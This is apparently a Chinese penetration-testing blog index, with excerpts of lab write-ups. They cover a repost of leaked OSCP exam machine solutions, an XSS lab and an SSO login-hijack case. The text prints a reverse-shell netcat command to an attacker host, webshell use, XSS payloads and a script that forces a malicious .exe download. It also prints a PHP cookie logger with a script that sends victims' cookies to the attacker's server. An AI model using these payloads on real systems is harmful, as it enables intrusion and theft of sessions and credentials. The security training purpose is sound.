InfoSec Learning


  • 首页

  • 归档

  • 标签

  • 搜索

Kioptrix 2014

发表于 2019-12-09 | 分类于 training

Kioptrix 2014

阅读全文 »

Pluck(本地文件包含+内核漏洞提权)

发表于 2019-12-08 | 分类于 training

靶机下载地址

阅读全文 »

oscp真题解析

发表于 2019-12-06 | 分类于 oscp

由于微信公众号文章的不稳定性,我收藏的某些文章竟然提示已经被作者删除。由于国内的网络安全法,所以遇到微信公众号上的好文章最好保存到本地,以免过段时间去看就已经被删掉了。

阅读全文 »

OSCP真题泄露-目前已经移除

发表于 2019-12-03 | 分类于 reference
OSCP真题泄露-目前已经移除

OSCP真题泄露-目前已经移除

不扯淡的套哥 安全圈套
3月15日

0x0010-关于:


这次考题的泄露是因为一位国外的大佬对近期OSCP考试中存在大量的替考和作弊者很不高兴,加之OSCP的考题很久很有变化,因此这位大佬很生气,就在他的推特和个人网站上陆续公开了一些考试writeups,offsec官方响应也很快,已经将泄露的机器移除了考试环境。但是,作为学习还是值得学习的,有助于摸清套路。


这位大佬的网站是:https://cyb3rsick.com/

泄露的真题在:https://cyb3rsick.com/category/oscp-exam-writups/?order=asc


0x0020-老真题讲解:


0x0021-192.168.x.53 – offsecsmtp – OutOfBox


原贴传送门:https://cyb3rsick.com/2019/01/20/192-168-x-53-offsecsmtp-outofbox-machine-writeup/


第一步:信息收集


用nmap进行主机扫描

命令:nmap 192.168.x.53 -A

发现80端口,找到192.168.x.53/robots.txt文件泄露2个md5值(例如:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx),这里可不是让你解md5,这是出题者故意藏起来的目录。

第二步:渗透


发现文件包含漏洞,GET请求“ /xxxxxxxxxxxxxxxxxxxxxxxx/inc2.html?passwd”获得passwd文件:



获得可以用户名:OutOfBox

使用ssh连接主机,账号密码都是OutOfBox



第三步:提权


NSF可写,可以创建一个可以行文件,用setuid(0)获得root权限:


上传后运行获得root:



【套路总结】:

1、端口扫描中发现web服务必是重点;

2、有web先看robots.txt;

3、passwd中的可以用户名肯定有问题(弱口令很有可能);

4、提权方法之一:setuid(0)


0x0022-192.168.x.161 – Ph33r machine


原贴传送门:https://cyb3rsick.com/2019/01/20/192-168-x-161-ph33r-machine-writeup/


第一步:信息收集


老规矩nmap扫描端口:nmap -A 192.168.x.161 


没有有价值发现,使用onesixtyone扫描,发现clam av运行在主机上,这个软件存在已知的后门利用

https://www.exploit-db.com/exploits/9913/ 


第二步:渗透


使用上面的exp打之,就可以获得在31337端口获得一个绑定shell,nc连上去就是root权限



【套路总结】:

1、第一步都是nmap扫描;

2、nmap未发现问题时,试试snmp扫描,可能有奇效;

3、注意一些冷门软件的漏洞,可以在exploit-db上搜索。


0x0023-192.168.x.55 – Admin-pc machine


原贴传送门:https://cyb3rsick.com/2019/01/22/192-168-x-55-admin-pc-machine-writeup/


第一步:信息收集

nmap:nmap 192.168.x.55 -A

结果如下:


发现ftp匿名访问。


第二步:渗透


ftp连上去获得xampp的配置文件:


获得用户认证信息如下:

fm:$apr1$yT3K79by$RbmkKdKGdaXs80zPCIZnR1

破解可得明文如下:

fm:x-files

进入后台:192.168.x.55:10433/admin可以进行文件管理进而执行命令。

上传nc并且上传php文件开执行命令“nc –vv YOUR_HOST 443 –e cmd.exe”获得反弹shell


第三步:提权


上传jsp的webshell到“c:/xampp/tomcat/webapps/examples”目录,浏览器访问192.168.x.55:10433/examples/cmd.jsp?cmd=whoami,即可获得管理员权限。


【套路总结】:

1、ftp匿名访问,尤其是可写权限的一定要注意;

2、xampp是重要考点之一,配置文件之类的要注意;

3、高端口肯定可疑,不是后台就是某些软件的漏洞;

4、提权可以多试试不同脚本,很有可能不同脚本的执行权限不一样,如php是低权限、jsp也许就是高权限。


0x0024-192.168.x.53 – unreal tournament machine


原贴传送门:https://cyb3rsick.com/2019/01/22/192-168-x-53-unreal-tournament-machine-writeup/


第一步:信息收集


端口扫描:


tcp端口未发现有价值的可以试试udp端口

发现udp开启7778端口,是一个IRC服务,使用IRC客户端登录,发现提示信息中有unreal tournament。


第二步:渗透


exploit-db搜索unreal tournament,发现漏洞exp:https://www.exploit-db.com/exploits/16145

替换其中shellcode


使用msf打之,搞定。


【套路总结】:

1、注意udp的高端口;

2、冷门软件exp到exploit-db上找;

3、具备替换shellcode的能力是必考点。


0x0025-192.168.x.55 – UCAL Machine


原贴传送门:https://cyb3rsick.com/2019/01/22/192-168-x-55-ucal-machine-writeup/


第一步:信息收集


web扫描直接上“nikto -host 192.168.x.55”

发现:



第二步:渗透


exploit-db上找exp:

https://www.exploit-db.com/raw/18775/

打之,获得反弹shell


第三步:提权


使用Mempodipper提权:

https://www.exploit-db.com/raw/35161/

搞定


【套路总结】:

1、web扫描主要靠找到使用的哪套web程序,再到exploit-db上找exp;

2、提权看内核版本找exp打。


0x0026-192.168.x.67 – OFFENSIV-W2K3 machine


原贴传送门:https://cyb3rsick.com/2019/01/22/192-168-x-67-offensiv-w2k3-machine-writeup/


第一步:信息收集


http://192.168.x.67:8080/mail/checkspool.php存在远程命令执行,可获得反弹shell


第二步:渗透提权


读取配置文件 C:\Program Files\hMailServer\Bin\ hMailServer.INI

获得加密的root密码

使用C:\Program Files\hMailServer\Addons\Utilities\DecryptBlowfish.vbs脚本解密

修改配置文件,增加密码方法如下:https://www.hmailserver.com/forum/viewtopic.php?t=31096


上传lib_mysqludf_sys.dll到C:\xampplite\htdocs

再上传webshell文件adminer.php

执行命令调用dll


增加管理员账号,登录就是管理员。


【套路总结】:

1、web是低权限shell常见入口;

2、应用软件的配置文件是重点(账号密码);

3、mysql的udf提权需要注意。


更多资源关注知识星球“OSCP轻松过”


    阅读
    相关阅读

    微信扫一扫
    关注该公众号

    阅读全文 »

    学习清单:为oscp做准备

    发表于 2019-11-22 | 分类于 experience

    Offensive Security Certified Professional

    阅读全文 »

    ptf框架

    发表于 2019-11-21 | 分类于 tools

    上一篇: AWS亚马逊云服务器搭建与使用

    • https://github.com/trustedsec/ptf
    • https://vimeo.com/137133837
    • https://www.freebuf.com/sectool/209091.html
    阅读全文 »

    Wall-rce与绕过waf(下)

    发表于 2019-11-18 | 分类于 training

    参考资料:绕过waf之命令执行

    阅读全文 »

    渗透实战第三版实验csk-web之XSS

    发表于 2019-11-16 | 分类于 web

    参考资料: 下载地址:

    • http://thehackerplaybook.com/get.php?type=csk-web

    echo 目标机器的ip chat >> /etc/hosts

    首先我们看下这个网站,注册一个账号并登陆。网页上有一些存在漏洞的提示。

    59

    反射型XSS

    http://chat:3000/chatchannel/1

    反射型XSS是最简单的xss,因为网页没有过滤用户输入,或者过滤不完全,导致用户可以输入js语句,根据js语句的不同,可以任意执行js代码。

    案例一,script标签

    <script>alert('xss')</script>

    60

    案例二,过滤script标签的情况

    <svg onload=alert(1788)>

    2

    案例三,点击弹窗

    <b onmouseover=alert('XSS')>Click Me!</b> 一旦鼠标移到Click Me!,就提示xss


    一旦点击就弹窗

    1
    2
    3
    <script>window.location = "https://www.youtube.com/watch?v=dQw4w9WgXcQ";</script>
    
    <body onload="alert('XSS')">
    

    3

    案例四,跳转并文件下载

    kali准备恶意代码exe,并开启web服务:

    1
    python -m SimpleHTTPServer 8001
    

    kali的ip为192.168.159.129

    访问路径为:http://192.168.159.129:8001/test.exe

    在页面上输入以下代码:

    1
    <script>var link = document.createElement('a'); link.href = 'http://192.168.159.129:8001/test.exe'; link.download = ''; document.body.appendChild(link); link.click();</script>
    

    于是客户端就会跳转到这个下载地址,http://192.168.159.129:8001/test.exe

    这个跳转并文件下载要配合存储型xss。

    案例五:cookie窃取

    将下面的php代码保存为cookie.php

    1
    2
    3
    4
    5
    6
    7
    8
    9
    <?php
    header ('Location:https://google.com');
    $cookies =$_GET["c"];
    $file = fopen('log.txt','a');
    fwrite($file, $cookies . "\n\n");
    ?>
    
    注意第二行header(),不能删除,如果没有这一行,那么目标点击窃取cookie的恶意链接,就会访问http://192.168.159.129:8002/cookie.php?c=xxxxx
    这样很容易被发现。
    

    然后用php开启web服务,

    php -S 192.168.159.129:8002

    这是kali的地址:http://192.168.159.129:8002/cookie.php

    存在漏洞的页面输入以下代码:

    1
    <script>document.location="http://192.168.159.129:8002/cookie.php?c="+document.cookie</script>
    

    61

    成功获取到了admin账号的cookie。

    但是这里有个问题,就是使用cookie登陆时候,发现cookie失效的时间太短了。

    62 经过数次尝试,因为输入窃取cookie的js代码,会跳转到google.com,这会导致用户的cookie退出网页,使得cookie直接失效。。

    要注意的是,速度要快。。cookie过期跟服务端的网页设置有关。 63

    阅读全文 »

    子域名搜集

    发表于 2019-11-13 | 分类于 tools

    上一篇说到了基于字典爆破的子域名搜集,这一篇讲一下基于搜索的子域名搜集。

    阅读全文 »

    绕过waf之命令执行

    发表于 2019-11-11 | 分类于 waf

    引子

    人生不是做菜,不能等所有材料准备好了再下锅。

    阅读全文 »

    Wall-rce与绕过waf(上)

    发表于 2019-11-09 | 分类于 training

    参考资料:

    • http://tylerrockwell.github.io/defeating-basic-auth-with-hydra/
    阅读全文 »

    sso登陆劫持漏洞

    发表于 2019-10-30 | 分类于 web

    引子

    最近项目遇到这个漏洞,但是我没有发现。。

    正文

    参考资料:

    • 腾讯单点登录系统跨域劫持漏洞

    • https://lvwei.me/passport.html#toc_8

    sso单点登陆,用户一次登陆,所有系统都可访问。

    sso设计目的是简化登陆方式,可能有很多系统,但是多个系统都是一个机构的,每个系统每次都要分别登陆就很复杂。

    举个例子,OpenID是一个很流行的sso框架,

    用户提交1. openID 2.openID Provider(提供者)

    网站重定向到openID provider认证,登陆成功后,再重定向回网站。

    这里可以理解为,门卫不知道你是谁,然后让你去某某处盖章,你去盖章完成后回到门卫处,门外验证红章没问题就让你通过。

    案例

    1
    http://abc.com/public/pages/login/index.html?backurl=http%3A%2F%2Fabc.com%2FAccount%2FLogin%3FReturnUrl%3D%252f&app=YuLinTu
    

    此处有一个参数backurl=abc.com,当修改此参数为backurl=abc.com.test

    网页向abc.com.test,也就是openID Provider(提供者)提交一串openID。

    提交后,网页提示无法连接abc.com.test,并且抓取到了一段数据包,包含了登陆成功的token。

    4

    由于客户可以伪造openID Provider(提供者),此处产生了sso登陆劫持漏洞。下列的sid是token。如果使用以下token,再次访问http://abc.com.test/Account/Login,可以发现已经登陆。

    1
    2
    http://abc.com.test/Account/Login?ReturnUrl=%2f&sid=c4d4e77e80ad1ee5c682
    8122a38b90d18077aeea4feb963a6c465e4691f65e767f11f935de6c3616
    

    攻击方式

    攻击者可以将backurl修改为自己的地址,然后发送恶意连接 http://abc.com/public/pages/login/index.html?backurl=http%3A%2F%2F恶意地址%2FAccount%2FLogin%3FReturnUrl%3D%252f&app=YuLinTu

    一旦受害者点击链接,并输入正确的用户名和密码。恶意地址会收到如下的get请求“GET /Account/Login?ReturnUrl=%2f&sid=96c2182d0da29dc720fab468734fef9e47ced2993df16fda6b03c98e92f6e77475b4cf56623430d6 ”

    攻击者就可以使用token sid=xxx,以受害者的身份进行登陆abc.com。

    阅读全文 »
    1 … 8 9 10 … 34
    whale

    whale

    Aimed at Pro Penetration tester. Email me "weaponmaster3070@gmail.com"

    400 日志
    32 分类
    45 标签
    github
    © 2021 whale
    由 Jekyll 强力驱动
    主题 - NexT.Mist
    本站访客数 人 总访问量 次